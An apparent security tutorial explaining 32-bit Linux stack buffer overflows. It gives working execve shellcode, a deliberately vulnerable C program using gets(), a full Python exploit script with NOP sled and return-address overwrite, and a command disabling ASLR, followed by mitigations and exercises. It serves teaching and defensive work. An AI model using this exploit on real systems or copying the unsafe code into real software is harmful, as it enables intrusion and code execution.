Intro to Stack Buffer Overflows: From Memory Layout to Exploit

Learn how stack memory is organized, spot vulnerable buffers, calculate precise offsets, craft tiny shellcode, inject it, and hijack control flow on Linux. This guide gives you hands-on examples, tooling tips, and mitigation strategies.

Introduction

Stack buffer overflows are one of the oldest yet still most relevant classes of memory-corruption bugs. By overwriting data that lives next to a local buffer, most notably the saved return address, you can divert program execution to attacker-controlled code. Understanding the mechanics is essential for both offensive exploit development and defensive hardening.

Why does it matter? In the early 2000s, worms such as Code Red (2001) and SQL Slammer (2003) exploited stack overflows to spread worldwide. Modern attacks still use the technique when mitigations (e.g., ASLR, stack canaries) are misconfigured or bypassed. Mastering the fundamentals lets you audit code, write reliable proofs of concept, and evaluate security controls.

Prerequisites

  • Basic C programming (arrays, pointers, function calls)
  • Linux command-line proficiency (gcc, objdump, gdb)
  • Fundamental GDB debugging skills (breakpoints, memory inspection)

Core Concepts

At a high level, a function call creates a stack frame that contains, from higher to lower addresses:

  1. Function arguments (passed on the stack on 32-bit x86, mostly in registers on x86-64)
  2. Saved return address (the address the CPU jumps to after ret)
  3. Saved base pointer (ebp/rbp) - used to restore the caller's frame
  4. Local variables (including buffers)

Typical calling convention on 32-bit Linux (cdecl): the caller pushes the arguments right-to-left, then the call instruction pushes the return address (the address of the instruction after the call) and jumps to the callee. The callee creates its frame with push ebp; mov ebp, esp; sub esp, N. The layout therefore looks like:

| higher addresses |
+-----------------+
| argN |
| ... |
| arg1 |
+-----------------+
| return address | <-- pushed by call, popped into eip by ret
+-----------------+
| saved ebp | <-- ebp (current frame) points here
+-----------------+
| local buffer |
| ... |
+-----------------+ <-- esp (stack grows downwards)
| lower addresses |

When a buffer is written without bounds checking, the bytes beyond its size spill toward higher addresses: first over the saved ebp, then over the return address, giving the attacker control over where ret jumps.
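To make the overwrite order concrete, here is a minimal Python simulation of the frame. It is only a model: the frame is a bytearray laid out as buffer, saved ebp, return address in increasing address order, and the names make_frame, unchecked_copy, and saved_values, as well as the two example addresses, are made up for illustration.

```python
import struct

BUF_SIZE = 64  # same size as the char buf[64] used in this guide


def make_frame(saved_ebp, ret_addr):
    """Model [buf | saved ebp | return address] in increasing address order."""
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, ret_addr)


def unchecked_copy(frame, data):
    """Mimic an unbounded copy into buf: every byte is written, BUF_SIZE is ignored."""
    frame[0:len(data)] = data


def saved_values(frame):
    """Return (saved ebp, return address) as currently stored in the frame."""
    return struct.unpack_from("<II", frame, BUF_SIZE)


# Hypothetical saved values; any 32-bit numbers would do.
frame = make_frame(saved_ebp=0xBFFFF2A8, ret_addr=0x080491D6)

# 64 bytes fill buf, the next 4 hit saved ebp, the next 4 hit the return address.
unchecked_copy(frame, b"A" * BUF_SIZE + b"BBBB" + b"CCCC")

ebp, ret = saved_values(frame)
print(hex(ebp), hex(ret))  # 0x42424242 0x43434343
```

An input of 64 bytes or fewer leaves both saved values untouched, which is exactly the bound a length check would enforce.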

Stack memory layout and calling conventions

Understanding the exact offsets is crucial. On x86-64 the System V ABI passes the first six integer arguments in registers (rdi, rsi, rdx, rcx, r8, r9) and only spills to the stack when needed. However, the stack frame still ends with the saved rbp (if frame pointers are kept) and the return address. Compilers can omit the frame pointer (-fomit-frame-pointer) which changes the layout, but for pedagogical examples we compile with -fno-omit-frame-pointer to keep the classic layout.

Example function:

void vulnerable(char *input) {
    char buf[64];        // 64-byte local buffer
    strcpy(buf, input);  // unsafe copy - no length check
}

Compiled with gcc -m32 -fno-omit-frame-pointer -fno-stack-protector -g -o vuln vuln.c, and assuming the compiler places buf directly below the saved ebp with no padding, the stack frame will be:

ebp - 0x40: buf[0]
... (64 bytes) ...
ebp - 0x01: buf[63]
ebp + 0x00: saved ebp
ebp + 0x04: return address

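The distance from buf to the saved return address is 64 (buf) + 4 (saved ebp) = 68 bytes. Compilers may add alignment padding or save extra registers, so treat 68 as an estimate to confirm in a debugger. This offset is what we will exploit later.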
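The same arithmetic can be checked mechanically. The sketch below describes the idealized frame (no padding, no extra saved registers) as a ctypes structure and reads the field offsets back; the class name Frame and its field names are illustrative only.

```python
import ctypes


class Frame(ctypes.Structure):
    """Idealized frame contents in increasing address order (assumes no padding)."""
    _fields_ = [
        ("buf", ctypes.c_char * 64),      # char buf[64]
        ("saved_ebp", ctypes.c_uint32),   # pushed by the function prologue
        ("ret_addr", ctypes.c_uint32),    # pushed by the call instruction
    ]


# Offsets are measured from buf[0], i.e. from the first byte the copy writes.
print(Frame.buf.offset, Frame.saved_ebp.offset, Frame.ret_addr.offset)  # 0 64 68
```

If a debugger reports a different distance for your build, adjust the model rather than the measurement: the real frame is the one the compiler produced.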

Identifying overflow conditions (fixed-size buffers, unchecked strcpy/gets)

Typical red flags in source code:

  • Fixed-size arrays on the stack (char buf[256];)
  • Use of legacy functions that do not enforce length (strcpy, strcat, gets, scanf("%s"))
  • Absence of explicit bounds checks before copying user data

Static analysis tools (e.g., cppcheck, the Clang Static Analyzer) often flag these patterns. In a compiled binary, you can locate them by searching the disassembly for calls to unsafe library functions:

objdump -d ./vuln | grep -i strcpy

When you find a call to strcpy that receives a user-controlled buffer, you have a candidate for exploitation.
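When the source is available, a first-pass audit for the red flags listed above can be as simple as a regular expression. The following is a rough sketch, not a replacement for a real analyzer: the function name find_unsafe_calls is hypothetical, it flags every scanf call regardless of format string, and it does not skip comments or string literals.

```python
import re

# Functions named as red flags in this section. The leading \b keeps
# fgets, strncpy, and sscanf from matching.
UNSAFE_CALL = re.compile(r"\b(gets|strcpy|strcat|scanf)\s*\(")


def find_unsafe_calls(source):
    """Return (line number, function name) for each suspicious call in C source text."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in UNSAFE_CALL.finditer(line):
            hits.append((lineno, match.group(1)))
    return hits


sample = """void vulnerable(char *input) {
    char buf[64];
    strcpy(buf, input);
    fgets(buf, sizeof buf, stdin);
}"""

print(find_unsafe_calls(sample))  # [(3, 'strcpy')]
```

Each hit is only a candidate; whether it is exploitable still depends on who controls the source argument and how large the destination is.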

Calculating offset with pattern creation tools

Manually counting bytes is error-prone. The pattern_create.rb script from Metasploit or the pwntools utility cyclic can generate a pattern of a desired length in which every 4-byte window is unique, so the bytes that end up in eip identify their own position in the input.

# Using pwntools (Python)
python3 - <<'PY'
from pwn import *
print(cyclic(200).decode())  # cyclic() returns bytes; decode to avoid printing b'...'
PY

Send this pattern as input, cause the program to crash, then examine the overwritten return address in GDB:

gdb -q ./vuln
(gdb) r $(python3 -c 'from pwn import *; print(cyclic(200).decode())')
(gdb) info registers eip

Suppose GDB shows eip 0x61616172 (the pattern bytes "raaa" read as a little-endian integer). Feed this value back into cyclic_find to retrieve the exact offset:

python3 - <<'PY'
from pwn import *
print(cyclic_find(0x61616172))
PY
# => 68

Now you know that the return address starts 68 bytes into the input, confirming our manual calculation.
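If pwntools is not installed, the idea behind the pattern is easy to reproduce. The sketch below generates a de Bruijn sequence over lowercase letters with 4-byte windows using the standard recursive construction, then looks up a crashed eip value. The helper names cyclic_pattern and pattern_offset are illustrative and are not the pwntools API.

```python
from itertools import islice
import string
import struct


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence over `alphabet` with window size n, byte by byte."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic_pattern(length):
    """First `length` bytes of the sequence; every 4-byte window in it is unique."""
    return bytes(islice(de_bruijn(string.ascii_lowercase.encode(), 4), length))


def pattern_offset(eip, length=1024):
    """Offset of the 4 bytes that ended up in eip (little-endian), or -1 if absent."""
    return cyclic_pattern(length).find(struct.pack("<I", eip))


print(cyclic_pattern(12))          # b'aaaabaaacaaa'
print(pattern_offset(0x61616172))  # 68
```

Because each window occurs only once, a single register value is enough to recover the offset, which is why no manual counting is needed.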

Crafting a minimal shellcode payload

For an introductory exploit we use the classic 32-bit execve shellcode. It executes /bin//sh with argv = {"/bin//sh", NULL} and leaves edx (the envp argument) at whatever value it already holds. A compact version is 23 bytes:

\x31\xc0 /* xor eax,eax */
\x50 /* push eax */
\x68\x2f\x2f\x73\x68  /* push 0x68732f2f */
\x68\x2f\x62\x69\x6e  /* push 0x6e69622f */
\x89\xe3 /* mov ebx,esp */
\x50 /* push eax */
\x53 /* push ebx */
\x89\xe1 /* mov ecx,esp */
\xb0\x0b /* mov al,0xb */
\xcd\x80 /* int 0x80 */

In C we can embed it as a byte array:

unsigned char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3" "\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

Make sure the binary is compiled with -z execstack, which marks the stack executable (that is, turns NX off for the stack); otherwise the shellcode faults as soon as it runs. Modern toolchains enable NX by default, so for this intro we disable it. Bypassing NX with return-to-libc is left to the practice exercises.
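Before injecting shellcode it is worth checking that it survives the copy routine. The sketch below assumes the two input paths used in this guide: strcpy stops at a NUL byte and gets stops at a newline. The names SHELLCODE, BAD_BYTES, and bad_bytes_in are illustrative.

```python
# The 23-byte shellcode from above, written as hex for easy comparison.
SHELLCODE = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd80")

# Bytes that would cut the payload short for each copy routine.
BAD_BYTES = {
    "strcpy": b"\x00",  # strcpy stops copying at the first NUL
    "gets": b"\n",      # gets stops reading at the first newline
}


def bad_bytes_in(payload, function):
    """Return the bad bytes (as hex strings) that occur in payload for this routine."""
    return [hex(b) for b in BAD_BYTES[function] if b in payload]


print(len(SHELLCODE))                     # 23
print(bad_bytes_in(SHELLCODE, "strcpy"))  # []
print(bad_bytes_in(SHELLCODE, "gets"))    # []
```

The same check applies to the packed return address: an address containing 0x00 cannot pass through strcpy, and one containing 0x0a cannot pass through gets.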

Injecting the payload via input vector

We combine three parts:

  1. Padding up to the offset (68 bytes)
  2. Overwrite the return address with an address inside the NOP sled that follows it
  3. Append the NOP sled and the shellcode after the overwritten return address

Assuming the buffer starts at 0xbffff200 (print it with p &buf in GDB while stopped inside vulnerable), the sled begins 68 + 4 bytes later. The payload can be built in Python:

import struct, sys
offset = 68
buf_addr = 0xbffff200
ret_addr = buf_addr + offset + 4 # first byte after the saved return address
payload = b"A" * offset # padding
payload += struct.pack("<I", ret_addr) # little-endian address
payload += b"\x90" * 16 # NOP sled
payload += b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
sys.stdout.buffer.write(payload + b"\n") # raw bytes; the newline ends gets()

Run the vulnerable program with this payload, keeping stdin open with cat so the spawned shell can read commands:

(python3 exploit.py; cat) | ./vuln

If everything aligns, the overwritten return address points to the NOP sled, which slides into the shellcode, spawning a shell with the same privileges as the vulnerable binary.
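A cheap sanity check before running the exploit is to unpack the return address from the payload and confirm that it really points into the sled. The sketch below assumes the layout described in this section (padding, 4-byte return address, sled, shellcode); the function name ret_lands_in_sled is hypothetical.

```python
import struct


def ret_lands_in_sled(payload, buf_addr, offset, sled_len):
    """True if the return address stored at `offset` points into the NOP sled."""
    (ret_addr,) = struct.unpack_from("<I", payload, offset)
    sled_start = buf_addr + offset + 4  # the sled sits right after the return address
    return sled_start <= ret_addr < sled_start + sled_len


offset, buf_addr, sled_len = 68, 0xBFFFF200, 16

# Return address aimed at the sled that follows it.
good = b"A" * offset + struct.pack("<I", buf_addr + offset + 4) + b"\x90" * sled_len
# Return address aimed at the start of the padding instead.
bad = b"A" * offset + struct.pack("<I", buf_addr) + b"\x90" * sled_len

print(ret_lands_in_sled(good, buf_addr, offset, sled_len))  # True
print(ret_lands_in_sled(bad, buf_addr, offset, sled_len))   # False
```

A longer sled widens the range of addresses that pass this check, which is the reason sleds tolerate small errors in the measured buffer address.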

Demonstrating control-flow hijack to execute shellcode

Full walkthrough:

  1. Compile the vulnerable program (stack protector off, executable stack on):
    gcc -m32 -fno-omit-frame-pointer -fno-stack-protector -z execstack -g -o vuln vuln.c
  2. Confirm the offset with a cyclic pattern (as described earlier).
  3. Locate the buffer address:
    gdb -q ./vuln
    (gdb) b vulnerable
    (gdb) r
    (gdb) p &buf
    # The printed address is where buf starts. It can shift outside GDB because the environment differs.
    
  4. Generate final payload with the exact address.
  5. Execute and verify a new shell appears.
    (python3 exploit.py; cat) | ./vuln
    # No prompt is shown because stdin is a pipe; type id to confirm the shell is running.
    # Even for a SUID-root binary, many shells drop the elevated privileges unless the shellcode first calls setuid(0).
    

In a real-world scenario you would need to bypass NX (called DEP on Windows) and ASLR. Mitigations like stack canaries, NX, ASLR, and PIE make this simple approach infeasible on a default modern build (RELRO, often listed alongside them, protects the GOT rather than the stack), but the core concepts remain the same: corrupt the saved return address, redirect execution, and run attacker-controlled code.

Practical Examples

Below is a minimal end-to-end PoC that you can compile on a 32-bit Ubuntu VM.

// vuln.c
#include <stdio.h>
#include <string.h>

void vulnerable() {
    char buf[64];
    printf("Enter data: ");
    fflush(stdout);
    gets(buf); // deliberately unsafe for demo
    printf("You entered: %s\n", buf);
}

int main() {
    vulnerable();
    return 0;
}

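Compile (the stack protector is disabled so the canary does not abort the demo; on newer toolchains that no longer declare gets, adding -std=gnu99 is one possible workaround):

gcc -m32 -fno-omit-frame-pointer -fno-stack-protector -z execstack -g -o vuln vuln.c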

Exploit script (Python 3):

#!/usr/bin/env python3
import struct, sys

# 1. Find offset (hard-coded for demo)
offset = 68
# 2. Buffer address - obtained from GDB (example value)
buf_addr = 0xffffd0f0
# 3. Shellcode (same as earlier)
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68" b"\x68\x2f\x62\x69\x6e\x89\xe3" b"\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

payload = b"A" * offset
payload += struct.pack("<I", buf_addr + offset + 4) # overwrite ret with the sled address
payload += b"\x90" * 16 # NOP sled
payload += shellcode

# Write the raw payload to stdout; vuln reads it from stdin via gets()
sys.stdout.buffer.write(payload + b"\n")

Piping the script's output into the binary with (python3 exploit.py; cat) | ./vuln spawns a shell that runs with the privileges of the vuln process. This concrete example reinforces the abstract steps discussed earlier.

Tools & Commands

  • gcc - compile with -fno-omit-frame-pointer, -fno-stack-protector, and -z execstack for demos.
  • gdb - set breakpoints, view stack, info registers, x/64xb $esp.
  • objdump -d - disassemble to locate vulnerable calls.
  • readelf -l - check the GNU_STACK segment flags (RW means NX is on, RWE means the stack is executable).
  • pwntools - cyclic, cyclic_find, and asm helpers.
  • radare2 or Binary Ninja - alternative reverse-engineering tools.

Example GDB session to view overwritten return address:

python3 -c 'from pwn import *; print(cyclic(100).decode())' > pattern.txt
gdb -q ./vuln
(gdb) run < pattern.txt
(gdb) info registers eip
(gdb) x/20xb $esp
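The readelf -l check from the tool list can also be done by reading the program headers directly. The sketch below handles only 32-bit little-endian ELF files, which matches the -m32 builds used in this guide; the function name stack_is_executable is hypothetical, and the field offsets follow the standard Elf32_Ehdr and Elf32_Phdr layouts.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type that carries the stack permissions
PF_X = 0x1                 # execute permission bit in p_flags


def stack_is_executable(elf):
    """Return True if a 32-bit little-endian ELF image requests an executable stack."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF image")
    (e_phoff,) = struct.unpack_from("<I", elf, 28)              # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)   # entry size and count
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", elf, base)
        (p_flags,) = struct.unpack_from("<I", elf, base + 24)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    # Assumption: with no PT_GNU_STACK header, treat the stack as executable,
    # which is the conservative reading for older x86 binaries.
    return True
```

A typical use would be to read ./vuln in binary mode and pass the bytes to the function; a build made with -z execstack should report True, and a default build should report False.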

Defense & Mitigation

  • Stack canaries - the compiler inserts a random value between the local variables and the saved frame pointer and return address; if the value has changed when the function returns, the program aborts.
  • Address Space Layout Randomization (ASLR) - randomizes the stack base, making static address guesses unreliable.
  • Non-Executable Stack (NX) - marks stack pages as non-executable, forcing attackers to use return-to-libc or ROP.
  • Compiler hardening flags:
    -fstack-protector-strong -D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security
  • Safe library functions - replace strcpy with a bounded copy such as snprintf(buf, sizeof buf, "%s", src) (strncpy alone does not guarantee NUL termination), and gets with fgets.
  • Code reviews & static analysis - tools like cppcheck, clang-tidy, and commercial SAST can flag unsafe patterns.
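The canary mechanism from the list above can be modelled in a few lines. This is a toy simulation, not how the compiler implements it: the class CanaryFrame and its methods are invented for illustration, the frame is a bytearray laid out as buffer, canary, saved ebp, return address, and the example return address is arbitrary.

```python
import os
import struct

BUF_SIZE = 64


class CanaryFrame:
    """Toy frame laid out as [buf | canary | saved ebp | return address]."""

    def __init__(self, ret_addr):
        self.canary = os.urandom(4)  # fresh random value, unknown to the attacker
        self.mem = bytearray(BUF_SIZE) + self.canary + struct.pack("<II", 0, ret_addr)

    def unchecked_copy(self, data):
        """Mimic an unbounded copy into buf."""
        self.mem[0:len(data)] = data

    def epilogue(self):
        """Check the canary before 'returning', as a protected function would."""
        if bytes(self.mem[BUF_SIZE:BUF_SIZE + 4]) != self.canary:
            raise RuntimeError("stack smashing detected")
        return struct.unpack_from("<I", self.mem, BUF_SIZE + 8)[0]


frame = CanaryFrame(ret_addr=0x080491D6)
frame.unchecked_copy(b"hello")
print(hex(frame.epilogue()))  # 0x80491d6
```

Any write that reaches the return address must first pass over the canary, so an overflow that does not reproduce the exact 4 random bytes is caught in epilogue before the corrupted address is used.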

Common Mistakes

  • Assuming the offset is always buffer size + 4; the compiler can add alignment padding, save extra registers, or reorder locals.
  • Neglecting endianness - forgetting to pack the address in little-endian on x86.
  • Using the wrong architecture (32-bit vs 64-bit) when calculating offsets.
  • Forgetting to disable ASLR during testing (echo 0 | sudo tee /proc/sys/kernel/randomize_va_space; writing to this file requires root).
  • Relying on gets in modern code - it has been removed from the C11 standard.
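The endianness mistake is easy to see by packing the same address both ways. The address below is only an example value.

```python
import struct

addr = 0xBFFFF248  # example stack address

little = struct.pack("<I", addr)  # byte order x86 expects in memory
big = struct.pack(">I", addr)     # byte order as the number is written

print(little.hex(), big.hex())  # 48f2ffbf bffff248

# ret reads the 4 bytes as a little-endian integer, so only the first
# form round-trips to the intended address.
print(hex(int.from_bytes(little, "little")))  # 0xbffff248
print(hex(int.from_bytes(big, "little")))     # 0x48f2ffbf
```

Writing the address bytes in reading order sends execution to 0x48f2ffbf instead, which usually ends in a segmentation fault rather than a shell.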

Real-World Impact

Even after two decades, stack overflows continue to surface in embedded devices, legacy services, and C/C++ applications that disable mitigations for performance. The Heartbleed bug, while a heap buffer over-read rather than a stack overflow, illustrates how a single unchecked length field can expose memory. In 2023, a vulnerable network appliance shipped with -z execstack enabled, allowing an attacker to gain remote root via a simple buffer overflow.

My experience as a red-team lead shows that many organizations still run custom binaries compiled without hardening flags. A quick audit for gets, strcpy, and missing -fstack-protector often yields exploitable paths. The trend is moving toward containerized workloads where the attack surface is smaller, but the underlying binaries remain the same, so the fundamentals we discuss are evergreen.

Practice Exercises

  1. Offset discovery: Compile the provided vuln.c, run it with a cyclic pattern of length 200, and use GDB to retrieve the exact offset.
  2. Shellcode injection: Modify the exploit script to place the shellcode at the very start of the buffer (no NOP sled) and adjust the return address accordingly.
  3. Canary bypass: Re-compile the binary with -fstack-protector. Observe how the program aborts when the overflow is attempted. Research techniques (e.g., format-string leaks) to leak the canary and bypass it.
  4. NX evasion: Disable the executable stack flag and rewrite the exploit to use a Return-to-Libc call to system("/bin/sh").
  5. ASLR awareness: Enable full ASLR, then use a brute-force script to demonstrate the difficulty of guessing the stack address without an information leak.

Document your findings and compare the effort required for each mitigation scenario.
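For the ASLR exercise, a back-of-the-envelope estimate helps set expectations before any brute-force script is written. The sketch below is a simplified model, not a measurement: it assumes the buffer address is uniformly distributed over 2**entropy_bits positions spaced step bytes apart, that each run is an independent guess, and that any guess landing in the NOP sled succeeds. The function name and the parameter values are illustrative.

```python
def expected_attempts(entropy_bits, sled_len, step=16):
    """Expected number of runs until one fixed guess lands in the NOP sled.

    Models each run as an independent trial with success probability
    (sled positions) / (possible buffer positions), i.e. a geometric distribution.
    """
    positions = 2 ** entropy_bits          # possible buffer placements
    winning = max(1, sled_len // step)     # placements where the guess hits the sled
    p = min(1.0, winning / positions)
    return 1.0 / p


# Illustrative numbers only: 19 bits of entropy is an assumption, not a measured value.
print(expected_attempts(19, 16))    # 524288.0
print(expected_attempts(19, 4096))  # 2048.0
```

The two results show why a longer sled helps brute force and why an information leak, which removes the guessing entirely, is the preferred route against ASLR.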

Further Reading

  • “Smashing The Stack For Fun And Profit” - Aleph One (classic paper)
  • “Hacking: The Art of Exploitation” - Jon Erickson (chapters on stack overflows)
  • Pwntools documentation
  • Linux Kernel Hardening
  • Modern exploit mitigation bypass techniques - ROP, JOP, and Sigreturn Oriented Programming.

Summary

Stack buffer overflows exploit the contiguous layout of a function’s stack frame. By locating a fixed-size buffer, overflowing it, calculating the exact offset, and overwriting the saved return address, an attacker can redirect execution to injected shellcode. The process involves:

  1. Understanding the calling convention and stack frame.
  2. Identifying unsafe code patterns.
  3. Using pattern-generation tools to pinpoint the overwrite offset.
  4. Crafting minimal, position-independent shellcode.
  5. Building a payload that places the shellcode in memory and hijacks control flow.
  6. Testing with GDB and refining the exploit.

Defensive measures such as canaries, ASLR, NX, and compiler hardening raise the bar significantly, but the underlying concepts remain a cornerstone of binary exploitation. Mastery of these fundamentals equips security professionals to both assess vulnerable code and design robust mitigations.